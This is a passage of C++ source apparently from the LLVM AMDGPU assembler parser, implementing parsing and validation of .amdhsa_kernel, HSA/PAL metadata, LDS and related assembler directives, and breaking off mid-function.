bool AMDGPUAsmParser::ParseAsAbsoluteExpression(uint32_t &Ret) {
int64_t Tmp = -1;
if (!isToken(AsmToken::Integer) && !isToken(AsmToken::Identifier)) {
return true;
}
if (getParser().parseAbsoluteExpression(Tmp)) {
return true;
}
Ret = static_cast<uint32_t>(Tmp);
return false;
}
bool AMDGPUAsmParser::ParseDirectiveMajorMinor(uint32_t &Major,
uint32_t &Minor) {
if (ParseAsAbsoluteExpression(Major))
return TokError("invalid major version");
if (!trySkipToken(AsmToken::Comma))
return TokError("minor version number required, comma expected");
if (ParseAsAbsoluteExpression(Minor))
return TokError("invalid minor version");
return false;
}
bool AMDGPUAsmParser::ParseDirectiveAMDGCNTarget() {
if (getSTI().getTargetTriple().getArch() != Triple::amdgcn)
return TokError("directive only supported for amdgcn architecture");
std::string TargetIDDirective;
SMLoc TargetStart = getTok().getLoc();
if (getParser().parseEscapedString(TargetIDDirective))
return true;
SMRange TargetRange = SMRange(TargetStart, getTok().getLoc());
if (getTargetStreamer().getTargetID()->toString() != TargetIDDirective)
return getParser().Error(TargetRange.Start,
(Twine(".amdgcn_target directive's target id ") +
Twine(TargetIDDirective) +
Twine(" does not match the specified target id ") +
Twine(getTargetStreamer().getTargetID()->toString())).str());
return false;
}
bool AMDGPUAsmParser::OutOfRangeError(SMRange Range) {
return Error(Range.Start, "value out of range", Range);
}
bool AMDGPUAsmParser::calculateGPRBlocks(
const FeatureBitset &Features, bool VCCUsed, bool FlatScrUsed,
bool XNACKUsed, Optional<bool> EnableWavefrontSize32, unsigned NextFreeVGPR,
SMRange VGPRRange, unsigned NextFreeSGPR, SMRange SGPRRange,
unsigned &VGPRBlocks, unsigned &SGPRBlocks) {
// TODO(scott.linder): These calculations are duplicated from
// AMDGPUAsmPrinter::getSIProgramInfo and could be unified.
IsaVersion Version = getIsaVersion(getSTI().getCPU());
unsigned NumVGPRs = NextFreeVGPR;
unsigned NumSGPRs = NextFreeSGPR;
if (Version.Major >= 10)
NumSGPRs = 0;
else {
unsigned MaxAddressableNumSGPRs =
IsaInfo::getAddressableNumSGPRs(&getSTI());
if (Version.Major >= 8 && !Features.test(FeatureSGPRInitBug) &&
NumSGPRs > MaxAddressableNumSGPRs)
return OutOfRangeError(SGPRRange);
NumSGPRs +=
IsaInfo::getNumExtraSGPRs(&getSTI(), VCCUsed, FlatScrUsed, XNACKUsed);
if ((Version.Major <= 7 || Features.test(FeatureSGPRInitBug)) &&
NumSGPRs > MaxAddressableNumSGPRs)
return OutOfRangeError(SGPRRange);
if (Features.test(FeatureSGPRInitBug))
NumSGPRs = IsaInfo::FIXED_NUM_SGPRS_FOR_INIT_BUG;
}
VGPRBlocks =
IsaInfo::getNumVGPRBlocks(&getSTI(), NumVGPRs, EnableWavefrontSize32);
SGPRBlocks = IsaInfo::getNumSGPRBlocks(&getSTI(), NumSGPRs);
return false;
}
bool AMDGPUAsmParser::ParseDirectiveAMDHSAKernel() {
if (getSTI().getTargetTriple().getArch() != Triple::amdgcn)
return TokError("directive only supported for amdgcn architecture");
if (getSTI().getTargetTriple().getOS() != Triple::AMDHSA)
return TokError("directive only supported for amdhsa OS");
StringRef KernelName;
if (getParser().parseIdentifier(KernelName))
return true;
kernel_descriptor_t KD = getDefaultAmdhsaKernelDescriptor(&getSTI());
StringSet<> Seen;
IsaVersion IVersion = getIsaVersion(getSTI().getCPU());
SMRange VGPRRange;
uint64_t NextFreeVGPR = 0;
uint64_t AccumOffset = 0;
SMRange SGPRRange;
uint64_t NextFreeSGPR = 0;
// Count the number of user SGPRs implied from the enabled feature bits.
unsigned ImpliedUserSGPRCount = 0;
// Track if the asm explicitly contains the directive for the user SGPR
// count.
Optional<unsigned> ExplicitUserSGPRCount;
bool ReserveVCC = true;
bool ReserveFlatScr = true;
Optional<bool> EnableWavefrontSize32;
while (true) {
while (trySkipToken(AsmToken::EndOfStatement));
StringRef ID;
SMRange IDRange = getTok().getLocRange();
if (!parseId(ID, "expected .amdhsa_ directive or .end_amdhsa_kernel"))
return true;
if (ID == ".end_amdhsa_kernel")
break;
if (Seen.find(ID) != Seen.end())
return TokError(".amdhsa_ directives cannot be repeated");
Seen.insert(ID);
SMLoc ValStart = getLoc();
int64_t IVal;
if (getParser().parseAbsoluteExpression(IVal))
return true;
SMLoc ValEnd = getLoc();
SMRange ValRange = SMRange(ValStart, ValEnd);
if (IVal < 0)
return OutOfRangeError(ValRange);
uint64_t Val = IVal;
#define PARSE_BITS_ENTRY(FIELD, ENTRY, VALUE, RANGE) \
if (!isUInt<ENTRY##_WIDTH>(VALUE)) \
return OutOfRangeError(RANGE); \
AMDHSA_BITS_SET(FIELD, ENTRY, VALUE);
if (ID == ".amdhsa_group_segment_fixed_size") {
if (!isUInt<sizeof(KD.group_segment_fixed_size) * CHAR_BIT>(Val))
return OutOfRangeError(ValRange);
KD.group_segment_fixed_size = Val;
} else if (ID == ".amdhsa_private_segment_fixed_size") {
if (!isUInt<sizeof(KD.private_segment_fixed_size) * CHAR_BIT>(Val))
return OutOfRangeError(ValRange);
KD.private_segment_fixed_size = Val;
} else if (ID == ".amdhsa_kernarg_size") {
if (!isUInt<sizeof(KD.kernarg_size) * CHAR_BIT>(Val))
return OutOfRangeError(ValRange);
KD.kernarg_size = Val;
} else if (ID == ".amdhsa_user_sgpr_count") {
ExplicitUserSGPRCount = Val;
} else if (ID == ".amdhsa_user_sgpr_private_segment_buffer") {
if (hasArchitectedFlatScratch())
return Error(IDRange.Start,
"directive is not supported with architected flat scratch",
IDRange);
PARSE_BITS_ENTRY(KD.kernel_code_properties,
KERNEL_CODE_PROPERTY_ENABLE_SGPR_PRIVATE_SEGMENT_BUFFER,
Val, ValRange);
if (Val)
ImpliedUserSGPRCount += 4;
} else if (ID == ".amdhsa_user_sgpr_dispatch_ptr") {
PARSE_BITS_ENTRY(KD.kernel_code_properties,
KERNEL_CODE_PROPERTY_ENABLE_SGPR_DISPATCH_PTR, Val,
ValRange);
if (Val)
ImpliedUserSGPRCount += 2;
} else if (ID == ".amdhsa_user_sgpr_queue_ptr") {
PARSE_BITS_ENTRY(KD.kernel_code_properties,
KERNEL_CODE_PROPERTY_ENABLE_SGPR_QUEUE_PTR, Val,
ValRange);
if (Val)
ImpliedUserSGPRCount += 2;
} else if (ID == ".amdhsa_user_sgpr_kernarg_segment_ptr") {
PARSE_BITS_ENTRY(KD.kernel_code_properties,
KERNEL_CODE_PROPERTY_ENABLE_SGPR_KERNARG_SEGMENT_PTR,
Val, ValRange);
if (Val)
ImpliedUserSGPRCount += 2;
} else if (ID == ".amdhsa_user_sgpr_dispatch_id") {
PARSE_BITS_ENTRY(KD.kernel_code_properties,
KERNEL_CODE_PROPERTY_ENABLE_SGPR_DISPATCH_ID, Val,
ValRange);
if (Val)
ImpliedUserSGPRCount += 2;
} else if (ID == ".amdhsa_user_sgpr_flat_scratch_init") {
if (hasArchitectedFlatScratch())
return Error(IDRange.Start,
"directive is not supported with architected flat scratch",
IDRange);
PARSE_BITS_ENTRY(KD.kernel_code_properties,
KERNEL_CODE_PROPERTY_ENABLE_SGPR_FLAT_SCRATCH_INIT, Val,
ValRange);
if (Val)
ImpliedUserSGPRCount += 2;
} else if (ID == ".amdhsa_user_sgpr_private_segment_size") {
PARSE_BITS_ENTRY(KD.kernel_code_properties,
KERNEL_CODE_PROPERTY_ENABLE_SGPR_PRIVATE_SEGMENT_SIZE,
Val, ValRange);
if (Val)
ImpliedUserSGPRCount += 1;
} else if (ID == ".amdhsa_wavefront_size32") {
if (IVersion.Major < 10)
return Error(IDRange.Start, "directive requires gfx10+", IDRange);
EnableWavefrontSize32 = Val;
PARSE_BITS_ENTRY(KD.kernel_code_properties,
KERNEL_CODE_PROPERTY_ENABLE_WAVEFRONT_SIZE32,
Val, ValRange);
} else if (ID == ".amdhsa_system_sgpr_private_segment_wavefront_offset") {
if (hasArchitectedFlatScratch())
return Error(IDRange.Start,
"directive is not supported with architected flat scratch",
IDRange);
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_PRIVATE_SEGMENT, Val, ValRange);
} else if (ID == ".amdhsa_enable_private_segment") {
if (!hasArchitectedFlatScratch())
return Error(
IDRange.Start,
"directive is not supported without architected flat scratch",
IDRange);
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_PRIVATE_SEGMENT, Val, ValRange);
} else if (ID == ".amdhsa_system_sgpr_workgroup_id_x") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_SGPR_WORKGROUP_ID_X, Val,
ValRange);
} else if (ID == ".amdhsa_system_sgpr_workgroup_id_y") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_SGPR_WORKGROUP_ID_Y, Val,
ValRange);
} else if (ID == ".amdhsa_system_sgpr_workgroup_id_z") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_SGPR_WORKGROUP_ID_Z, Val,
ValRange);
} else if (ID == ".amdhsa_system_sgpr_workgroup_info") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_SGPR_WORKGROUP_INFO, Val,
ValRange);
} else if (ID == ".amdhsa_system_vgpr_workitem_id") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_VGPR_WORKITEM_ID, Val,
ValRange);
} else if (ID == ".amdhsa_next_free_vgpr") {
VGPRRange = ValRange;
NextFreeVGPR = Val;
} else if (ID == ".amdhsa_next_free_sgpr") {
SGPRRange = ValRange;
NextFreeSGPR = Val;
} else if (ID == ".amdhsa_accum_offset") {
if (!isGFX90A())
return Error(IDRange.Start, "directive requires gfx90a+", IDRange);
AccumOffset = Val;
} else if (ID == ".amdhsa_reserve_vcc") {
if (!isUInt<1>(Val))
return OutOfRangeError(ValRange);
ReserveVCC = Val;
} else if (ID == ".amdhsa_reserve_flat_scratch") {
if (IVersion.Major < 7)
return Error(IDRange.Start, "directive requires gfx7+", IDRange);
if (hasArchitectedFlatScratch())
return Error(IDRange.Start,
"directive is not supported with architected flat scratch",
IDRange);
if (!isUInt<1>(Val))
return OutOfRangeError(ValRange);
ReserveFlatScr = Val;
} else if (ID == ".amdhsa_reserve_xnack_mask") {
if (IVersion.Major < 8)
return Error(IDRange.Start, "directive requires gfx8+", IDRange);
if (!isUInt<1>(Val))
return OutOfRangeError(ValRange);
if (Val != getTargetStreamer().getTargetID()->isXnackOnOrAny())
return getParser().Error(IDRange.Start, ".amdhsa_reserve_xnack_mask does not match target id",
IDRange);
} else if (ID == ".amdhsa_float_round_mode_32") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc1,
COMPUTE_PGM_RSRC1_FLOAT_ROUND_MODE_32, Val, ValRange);
} else if (ID == ".amdhsa_float_round_mode_16_64") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc1,
COMPUTE_PGM_RSRC1_FLOAT_ROUND_MODE_16_64, Val, ValRange);
} else if (ID == ".amdhsa_float_denorm_mode_32") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc1,
COMPUTE_PGM_RSRC1_FLOAT_DENORM_MODE_32, Val, ValRange);
} else if (ID == ".amdhsa_float_denorm_mode_16_64") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc1,
COMPUTE_PGM_RSRC1_FLOAT_DENORM_MODE_16_64, Val,
ValRange);
} else if (ID == ".amdhsa_dx10_clamp") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc1,
COMPUTE_PGM_RSRC1_ENABLE_DX10_CLAMP, Val, ValRange);
} else if (ID == ".amdhsa_ieee_mode") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc1, COMPUTE_PGM_RSRC1_ENABLE_IEEE_MODE,
Val, ValRange);
} else if (ID == ".amdhsa_fp16_overflow") {
if (IVersion.Major < 9)
return Error(IDRange.Start, "directive requires gfx9+", IDRange);
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc1, COMPUTE_PGM_RSRC1_FP16_OVFL, Val,
ValRange);
} else if (ID == ".amdhsa_tg_split") {
if (!isGFX90A())
return Error(IDRange.Start, "directive requires gfx90a+", IDRange);
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc3, COMPUTE_PGM_RSRC3_GFX90A_TG_SPLIT, Val,
ValRange);
} else if (ID == ".amdhsa_workgroup_processor_mode") {
if (IVersion.Major < 10)
return Error(IDRange.Start, "directive requires gfx10+", IDRange);
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc1, COMPUTE_PGM_RSRC1_WGP_MODE, Val,
ValRange);
} else if (ID == ".amdhsa_memory_ordered") {
if (IVersion.Major < 10)
return Error(IDRange.Start, "directive requires gfx10+", IDRange);
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc1, COMPUTE_PGM_RSRC1_MEM_ORDERED, Val,
ValRange);
} else if (ID == ".amdhsa_forward_progress") {
if (IVersion.Major < 10)
return Error(IDRange.Start, "directive requires gfx10+", IDRange);
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc1, COMPUTE_PGM_RSRC1_FWD_PROGRESS, Val,
ValRange);
} else if (ID == ".amdhsa_exception_fp_ieee_invalid_op") {
PARSE_BITS_ENTRY(
KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_EXCEPTION_IEEE_754_FP_INVALID_OPERATION, Val,
ValRange);
} else if (ID == ".amdhsa_exception_fp_denorm_src") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_EXCEPTION_FP_DENORMAL_SOURCE,
Val, ValRange);
} else if (ID == ".amdhsa_exception_fp_ieee_div_zero") {
PARSE_BITS_ENTRY(
KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_EXCEPTION_IEEE_754_FP_DIVISION_BY_ZERO, Val,
ValRange);
} else if (ID == ".amdhsa_exception_fp_ieee_overflow") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_EXCEPTION_IEEE_754_FP_OVERFLOW,
Val, ValRange);
} else if (ID == ".amdhsa_exception_fp_ieee_underflow") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_EXCEPTION_IEEE_754_FP_UNDERFLOW,
Val, ValRange);
} else if (ID == ".amdhsa_exception_fp_ieee_inexact") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_EXCEPTION_IEEE_754_FP_INEXACT,
Val, ValRange);
} else if (ID == ".amdhsa_exception_int_div_zero") {
PARSE_BITS_ENTRY(KD.compute_pgm_rsrc2,
COMPUTE_PGM_RSRC2_ENABLE_EXCEPTION_INT_DIVIDE_BY_ZERO,
Val, ValRange);
} else {
return Error(IDRange.Start, "unknown .amdhsa_kernel directive", IDRange);
}
#undef PARSE_BITS_ENTRY
}
if (Seen.find(".amdhsa_next_free_vgpr") == Seen.end())
return TokError(".amdhsa_next_free_vgpr directive is required");
if (Seen.find(".amdhsa_next_free_sgpr") == Seen.end())
return TokError(".amdhsa_next_free_sgpr directive is required");
unsigned VGPRBlocks;
unsigned SGPRBlocks;
if (calculateGPRBlocks(getFeatureBits(), ReserveVCC, ReserveFlatScr,
getTargetStreamer().getTargetID()->isXnackOnOrAny(),
EnableWavefrontSize32, NextFreeVGPR,
VGPRRange, NextFreeSGPR, SGPRRange, VGPRBlocks,
SGPRBlocks))
return true;
if (!isUInt<COMPUTE_PGM_RSRC1_GRANULATED_WORKITEM_VGPR_COUNT_WIDTH>(
VGPRBlocks))
return OutOfRangeError(VGPRRange);
AMDHSA_BITS_SET(KD.compute_pgm_rsrc1,
COMPUTE_PGM_RSRC1_GRANULATED_WORKITEM_VGPR_COUNT, VGPRBlocks);
if (!isUInt<COMPUTE_PGM_RSRC1_GRANULATED_WAVEFRONT_SGPR_COUNT_WIDTH>(
SGPRBlocks))
return OutOfRangeError(SGPRRange);
AMDHSA_BITS_SET(KD.compute_pgm_rsrc1,
COMPUTE_PGM_RSRC1_GRANULATED_WAVEFRONT_SGPR_COUNT,
SGPRBlocks);
if (ExplicitUserSGPRCount && ImpliedUserSGPRCount > *ExplicitUserSGPRCount)
return TokError("amdgpu_user_sgpr_count smaller than than implied by "
"enabled user SGPRs");
unsigned UserSGPRCount =
ExplicitUserSGPRCount ? *ExplicitUserSGPRCount : ImpliedUserSGPRCount;
if (!isUInt<COMPUTE_PGM_RSRC2_USER_SGPR_COUNT_WIDTH>(UserSGPRCount))
return TokError("too many user SGPRs enabled");
AMDHSA_BITS_SET(KD.compute_pgm_rsrc2, COMPUTE_PGM_RSRC2_USER_SGPR_COUNT,
UserSGPRCount);
if (isGFX90A()) {
if (Seen.find(".amdhsa_accum_offset") == Seen.end())
return TokError(".amdhsa_accum_offset directive is required");
if (AccumOffset < 4 || AccumOffset > 256 || (AccumOffset & 3))
return TokError("accum_offset should be in range [4..256] in "
"increments of 4");
if (AccumOffset > alignTo(std::max((uint64_t)1, NextFreeVGPR), 4))
return TokError("accum_offset exceeds total VGPR allocation");
AMDHSA_BITS_SET(KD.compute_pgm_rsrc3, COMPUTE_PGM_RSRC3_GFX90A_ACCUM_OFFSET,
(AccumOffset / 4 - 1));
}
getTargetStreamer().EmitAmdhsaKernelDescriptor(
getSTI(), KernelName, KD, NextFreeVGPR, NextFreeSGPR, ReserveVCC,
ReserveFlatScr);
return false;
}
bool AMDGPUAsmParser::ParseDirectiveHSACodeObjectVersion() {
uint32_t Major;
uint32_t Minor;
if (ParseDirectiveMajorMinor(Major, Minor))
return true;
getTargetStreamer().EmitDirectiveHSACodeObjectVersion(Major, Minor);
return false;
}
bool AMDGPUAsmParser::ParseDirectiveHSACodeObjectISA() {
uint32_t Major;
uint32_t Minor;
uint32_t Stepping;
StringRef VendorName;
StringRef ArchName;
// If this directive has no arguments, then use the ISA version for the
// targeted GPU.
if (isToken(AsmToken::EndOfStatement)) {
AMDGPU::IsaVersion ISA = AMDGPU::getIsaVersion(getSTI().getCPU());
getTargetStreamer().EmitDirectiveHSACodeObjectISAV2(ISA.Major, ISA.Minor,
ISA.Stepping,
"AMD", "AMDGPU");
return false;
}
if (ParseDirectiveMajorMinor(Major, Minor))
return true;
if (!trySkipToken(AsmToken::Comma))
return TokError("stepping version number required, comma expected");
if (ParseAsAbsoluteExpression(Stepping))
return TokError("invalid stepping version");
if (!trySkipToken(AsmToken::Comma))
return TokError("vendor name required, comma expected");
if (!parseString(VendorName, "invalid vendor name"))
return true;
if (!trySkipToken(AsmToken::Comma))
return TokError("arch name required, comma expected");
if (!parseString(ArchName, "invalid arch name"))
return true;
getTargetStreamer().EmitDirectiveHSACodeObjectISAV2(Major, Minor, Stepping,
VendorName, ArchName);
return false;
}
bool AMDGPUAsmParser::ParseAMDKernelCodeTValue(StringRef ID,
amd_kernel_code_t &Header) {
// max_scratch_backing_memory_byte_size is deprecated. Ignore it while parsing
// assembly for backwards compatibility.
if (ID == "max_scratch_backing_memory_byte_size") {
Parser.eatToEndOfStatement();
return false;
}
SmallString<40> ErrStr;
raw_svector_ostream Err(ErrStr);
if (!parseAmdKernelCodeField(ID, getParser(), Header, Err)) {
return TokError(Err.str());
}
Lex();
if (ID == "enable_wavefront_size32") {
if (Header.code_properties & AMD_CODE_PROPERTY_ENABLE_WAVEFRONT_SIZE32) {
if (!isGFX10Plus())
return TokError("enable_wavefront_size32=1 is only allowed on GFX10+");
if (!getFeatureBits()[AMDGPU::FeatureWavefrontSize32])
return TokError("enable_wavefront_size32=1 requires +WavefrontSize32");
} else {
if (!getFeatureBits()[AMDGPU::FeatureWavefrontSize64])
return TokError("enable_wavefront_size32=0 requires +WavefrontSize64");
}
}
if (ID == "wavefront_size") {
if (Header.wavefront_size == 5) {
if (!isGFX10Plus())
return TokError("wavefront_size=5 is only allowed on GFX10+");
if (!getFeatureBits()[AMDGPU::FeatureWavefrontSize32])
return TokError("wavefront_size=5 requires +WavefrontSize32");
} else if (Header.wavefront_size == 6) {
if (!getFeatureBits()[AMDGPU::FeatureWavefrontSize64])
return TokError("wavefront_size=6 requires +WavefrontSize64");
}
}
if (ID == "enable_wgp_mode") {
if (G_00B848_WGP_MODE(Header.compute_pgm_resource_registers) &&
!isGFX10Plus())
return TokError("enable_wgp_mode=1 is only allowed on GFX10+");
}
if (ID == "enable_mem_ordered") {
if (G_00B848_MEM_ORDERED(Header.compute_pgm_resource_registers) &&
!isGFX10Plus())
return TokError("enable_mem_ordered=1 is only allowed on GFX10+");
}
if (ID == "enable_fwd_progress") {
if (G_00B848_FWD_PROGRESS(Header.compute_pgm_resource_registers) &&
!isGFX10Plus())
return TokError("enable_fwd_progress=1 is only allowed on GFX10+");
}
return false;
}
bool AMDGPUAsmParser::ParseDirectiveAMDKernelCodeT() {
amd_kernel_code_t Header;
AMDGPU::initDefaultAMDKernelCodeT(Header, &getSTI());
while (true) {
// Lex EndOfStatement. This is in a while loop, because lexing a comment
// will set the current token to EndOfStatement.
while(trySkipToken(AsmToken::EndOfStatement));
StringRef ID;
if (!parseId(ID, "expected value identifier or .end_amd_kernel_code_t"))
return true;
if (ID == ".end_amd_kernel_code_t")
break;
if (ParseAMDKernelCodeTValue(ID, Header))
return true;
}
getTargetStreamer().EmitAMDKernelCodeT(Header);
return false;
}
bool AMDGPUAsmParser::ParseDirectiveAMDGPUHsaKernel() {
StringRef KernelName;
if (!parseId(KernelName, "expected symbol name"))
return true;
getTargetStreamer().EmitAMDGPUSymbolType(KernelName,
ELF::STT_AMDGPU_HSA_KERNEL);
KernelScope.initialize(getContext());
return false;
}
bool AMDGPUAsmParser::ParseDirectiveISAVersion() {
if (getSTI().getTargetTriple().getArch() != Triple::amdgcn) {
return Error(getLoc(),
".amd_amdgpu_isa directive is not available on non-amdgcn "
"architectures");
}
auto TargetIDDirective = getLexer().getTok().getStringContents();
if (getTargetStreamer().getTargetID()->toString() != TargetIDDirective)
return Error(getParser().getTok().getLoc(), "target id must match options");
getTargetStreamer().EmitISAVersion();
Lex();
return false;
}
bool AMDGPUAsmParser::ParseDirectiveHSAMetadata() {
const char *AssemblerDirectiveBegin;
const char *AssemblerDirectiveEnd;
std::tie(AssemblerDirectiveBegin, AssemblerDirectiveEnd) =
isHsaAbiVersion3AndAbove(&getSTI())
? std::make_tuple(HSAMD::V3::AssemblerDirectiveBegin,
HSAMD::V3::AssemblerDirectiveEnd)
: std::make_tuple(HSAMD::AssemblerDirectiveBegin,
HSAMD::AssemblerDirectiveEnd);
if (getSTI().getTargetTriple().getOS() != Triple::AMDHSA) {
return Error(getLoc(),
(Twine(AssemblerDirectiveBegin) + Twine(" directive is "
"not available on non-amdhsa OSes")).str());
}
std::string HSAMetadataString;
if (ParseToEndDirective(AssemblerDirectiveBegin, AssemblerDirectiveEnd,
HSAMetadataString))
return true;
if (isHsaAbiVersion3AndAbove(&getSTI())) {
if (!getTargetStreamer().EmitHSAMetadataV3(HSAMetadataString))
return Error(getLoc(), "invalid HSA metadata");
} else {
if (!getTargetStreamer().EmitHSAMetadataV2(HSAMetadataString))
return Error(getLoc(), "invalid HSA metadata");
}
return false;
}
/// Common code to parse out a block of text (typically YAML) between start and
/// end directives.
bool AMDGPUAsmParser::ParseToEndDirective(const char *AssemblerDirectiveBegin,
const char *AssemblerDirectiveEnd,
std::string &CollectString) {
raw_string_ostream CollectStream(CollectString);
getLexer().setSkipSpace(false);
bool FoundEnd = false;
while (!isToken(AsmToken::Eof)) {
while (isToken(AsmToken::Space)) {
CollectStream << getTokenStr();
Lex();
}
if (trySkipId(AssemblerDirectiveEnd)) {
FoundEnd = true;
break;
}
CollectStream << Parser.parseStringToEndOfStatement()
<< getContext().getAsmInfo()->getSeparatorString();
Parser.eatToEndOfStatement();
}
getLexer().setSkipSpace(true);
if (isToken(AsmToken::Eof) && !FoundEnd) {
return TokError(Twine("expected directive ") +
Twine(AssemblerDirectiveEnd) + Twine(" not found"));
}
CollectStream.flush();
return false;
}
/// Parse the assembler directive for new MsgPack-format PAL metadata.
bool AMDGPUAsmParser::ParseDirectivePALMetadataBegin() {
std::string String;
if (ParseToEndDirective(AMDGPU::PALMD::AssemblerDirectiveBegin,
AMDGPU::PALMD::AssemblerDirectiveEnd, String))
return true;
auto PALMetadata = getTargetStreamer().getPALMetadata();
if (!PALMetadata->setFromString(String))
return Error(getLoc(), "invalid PAL metadata");
return false;
}
/// Parse the assembler directive for old linear-format PAL metadata.
bool AMDGPUAsmParser::ParseDirectivePALMetadata() {
if (getSTI().getTargetTriple().getOS() != Triple::AMDPAL) {
return Error(getLoc(),
(Twine(PALMD::AssemblerDirective) + Twine(" directive is "
"not available on non-amdpal OSes")).str());
}
auto PALMetadata = getTargetStreamer().getPALMetadata();
PALMetadata->setLegacy();
for (;;) {
uint32_t Key, Value;
if (ParseAsAbsoluteExpression(Key)) {
return TokError(Twine("invalid value in ") +
Twine(PALMD::AssemblerDirective));
}
if (!trySkipToken(AsmToken::Comma)) {
return TokError(Twine("expected an even number of values in ") +
Twine(PALMD::AssemblerDirective));
}
if (ParseAsAbsoluteExpression(Value)) {
return TokError(Twine("invalid value in ") +
Twine(PALMD::AssemblerDirective));
}
PALMetadata->setRegister(Key, Value);
if (!trySkipToken(AsmToken::Comma))
break;
}
return false;
}
/// ParseDirectiveAMDGPULDS
/// ::= .amdgpu_lds identifier ',' size_expression [',' align_expression]
bool AMDGPUAsmParser::ParseDirectiveAMDGPULDS() {
if (getParser().checkForValidSection())
return true;
StringRef Name;
SMLoc NameLoc = getLoc();
if (getParser().parseIdentifier(Name))
return TokError("expected identifier in directive");
MCSymbol *Symbol = getContext().getOrCreateSymbol(Name);
if (parseToken(AsmToken::Comma, "expected ','"))
return true;
unsigned LocalMemorySize = AMDGPU::IsaInfo::getLocalMemorySize(&getSTI());
int64_t Size;
SMLoc SizeLoc = getLoc();
if (getParser().parseAbsoluteExpression(Size))
return true;
if (Size < 0)
return Error(SizeLoc, "size must be non-negative");
if (Size > LocalMemorySize)
return Error(SizeLoc, "size is too large");
int64_t Alignment = 4;
if (trySkipToken(AsmToken::Comma)) {
SMLoc AlignLoc = getLoc();
if (getParser().parseAbsoluteExpression(Alignment))
return true;
if (Alignment < 0 || !isPowerOf2_64(Alignment))
return Error(AlignLoc, "alignment must be a power of two");
// Alignment larger than the size of LDS is possible in theory, as long
// as the linker manages to place to symbol at address 0, but we do want
// to make sure the alignment fits nicely into a 32-bit integer.
if (Alignment >= 1u << 31)
return Error(AlignLoc, "alignment is too large");
}
if (parseToken(AsmToken::EndOfStatement,
"unexpected token in '.amdgpu_lds' directive"))
return true;
Symbol->redefineIfPossible();
if (!Symbol->isUndefined())
return Error(NameLoc, "invalid symbol redefinition");
getTargetStreamer().emitAMDGPULDS(Symbol, Size, Align(Alignment));
return false;
}
bool AMDGPUAsmParser::ParseDirective(AsmToken DirectiveID) {
StringRef IDVal = DirectiveID.getString();
if (isHsaAbiVersion3AndAbove(&getSTI())) {
if (IDVal == ".amdhsa_kernel")
return ParseDirectiveAMDHSAKernel();
// TODO: Restructure/combine with PAL metadata directive.
if (IDVal == AMDGPU::HSAMD::V3::AssemblerDirectiveBegin)
return ParseDirectiveHSAMetadata();
} else {
if (IDVal == ".hsa_code_object_version")
return ParseDirectiveHSACodeObjectVersion();
if (IDVal == ".hsa_code_object_isa")
return ParseDirectiveHSACodeObjectISA();
if (IDVal == ".amd_kernel_code_t")
return ParseDirectiveAMDKernelCodeT();
if (IDVal == ".amdgpu_hsa_kernel")
return ParseDirectiveAMDGPUHsaKernel();
if (IDVal == ".amd_amdgpu_isa")
return ParseDirectiveISAVersion();
if (IDVal == AMDGPU::HSAMD::AssemblerDirectiveBegin)
return ParseDirectiveHSAMetadata();
}
if (IDVal == ".amdgcn_target")
return ParseDirectiveAMDGCNTarget();
if (IDVal == ".amdgpu_lds")
return ParseDirectiveAMDGPULDS();
if (IDVal == PALMD::AssemblerDirectiveBegin)
return ParseDirectivePALMetadataBegin();
if (IDVal == PALMD::AssemblerDirective)
return ParseDirectivePALMetadata();
return true;
}
bool AMDGPUAsmParser::subtargetHasRegister(const MCRegisterInfo &MRI,
unsigned RegNo) {
for (MCRegAliasIterator R(AMDGPU::TTMP12_TTMP13_TTMP14_TTMP15, &MRI, true);
R.isValid(); ++R) {
if (*R == RegNo)
return isGFX9Plus();
}
// GFX10 has 2 more SGPRs 104 and 105.
for (MCRegAliasIterator R(AMDGPU::SGPR104_SGPR105, &MRI, true);
R.isValid(); ++R) {
if (*R == RegNo)
return hasSGPR104_SGPR105();
}
switch (RegNo) {
case AMDGPU::SRC_SHARED_BASE:
case AMDGPU::SRC_SHARED_LIMIT:
case AMDGPU::SRC_PRIVATE_BASE:
case AMDGPU::SRC_PRIVATE_LIMIT:
case AMDGPU::SRC_POPS_EXITING_WAVE_ID:
return isGFX9Plus();
case AMDGPU::TBA:
case AMDGPU::TBA_LO:
case AMDGPU::TBA_HI:
case AMDGPU::TMA:
case AMDGPU::TMA_LO:
case AMDGPU::TMA_HI:
return !isGFX9Plus();
case AMDGPU::XNACK_MASK:
case AMDGPU::XNACK_MASK_LO:
case AMDGPU::XNACK_MASK_HI:
return (isVI() || isGFX9()) && getTargetStreamer().getTargetID()->isXnackSupported();
case AMDGPU::SGPR_NULL:
return isGFX10Plus();
default:
break;
}
if (isCI())
return true;
if (isSI() || isGFX10Plus()) {
// No flat_scr on SI.
// On GFX10 flat scratch is not a valid register operand and can only be
